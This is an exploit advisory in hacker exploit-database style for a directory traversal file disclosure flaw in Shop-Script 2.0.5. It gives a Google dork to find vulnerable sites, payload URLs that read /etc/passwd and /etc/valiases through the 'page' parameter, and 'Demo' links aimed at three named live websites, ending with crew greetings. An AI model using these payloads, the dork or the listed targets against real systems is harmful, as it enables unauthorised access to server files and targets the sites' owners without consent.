# Exploit Title: ["Intelligent Technology" Shop-Script 2.0.5 index.php?page= Remote File Disclosure] # Google Dork: intext: Разработка сайта © Компания "Разумные технологии" # Vendor site: http://razumteh.com/ # Date: [17/10/2010] # Author: [d3v1l r00t3r] # Version: [3.05] # Tested on: [Windows Xp, Windows Server, Linux, Ubuntu ] ################################################################################################################ "Intelligent Technology" Shop-Script 2.0.5 index.php?page= Remote File Disclosure ################################################################################################################ Author : d3v1l r00t3r Dork : intext: Разработка сайта © Компания "Разумные технологии" ################################################################################################################ Proof Of Concept : http://localhost/[path]/index.php?page=../../../../etc/passwd http://localhost/[path]/index.php?page=../../../../etc/valiases/{Reverse Website} ################################################################################################################ Demo: http://офисная-мебель.com.ua/index.php?page=../../../../etc/passwd http://supernova.kiev.ua/index.php?page=../../../../etc/valiases/supernova.kiev.ua http://nikamebel.com/index.php?page=../../../../etc/passwd ################################################################################################################ Gr33ts t0: T3es, S@XXOR, Prosperous, Shadow008, J|nx, HexCoder, dreams.hacker,Stupid, ..:arsh:.., Anthrax, MindCracker,Niyola270, 0ludonh4ck3r & v1p3r ################################################################################################################ We Ar3 ABH Hack3r6- (Trust And Safety) Am not a Russian hack3r, but i see some vuln in Russia...1 L0v3